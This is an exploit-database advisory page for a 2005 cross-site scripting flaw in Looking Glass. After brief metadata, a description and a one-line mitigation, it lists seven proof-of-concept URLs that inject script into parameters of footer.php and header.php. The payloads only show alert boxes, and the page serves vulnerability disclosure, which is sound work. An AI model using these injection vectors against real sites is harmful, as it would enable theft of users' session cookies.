header-logo
Suggest Exploit
vendor:
Looking Glass
by:
SecurityFocus
7.5
CVSS
HIGH
Cross-Site Scripting
79
CWE
Product Name: Looking Glass
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

Looking Glass Cross-Site Scripting Vulnerability

Looking Glass is prone to a cross-site scripting vulnerability. This issue may be exploited to steal cookie-based authentication credentials from legitimate users of the software. Other attacks are also possible.

Mitigation:

Input validation should be used to prevent malicious code from being injected into the application.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/14680/info

Looking Glass is prone to a cross-site scripting vulnerability.

This issue may be exploited to steal cookie-based authentication credentials from legitimate users of the software. Other attacks are also possible. 

http://www.example.com/[path]/footer.php?version[fullname]=</a><script>alert('lol')</script>
http://www.example.com/[path]/footer.php?version[homepage]="><script>alert('lol')</script>
http://www.example.com/[path]/footer.php?version[no]=<script>alert('lol')</script>
http://www.example.com/[path]/header.php?version[fullname]=<script>alert('lol')</script>
http://www.example.com/[path]/header.php?version[no]=</title><script>alert('lol')</script>
http://www.example.com/[path]/header.php?version[author]=--><script>alert('lol')</script>
http://www.example.com/[path]/header.php?version[email]=--><script>alert('lol')</script>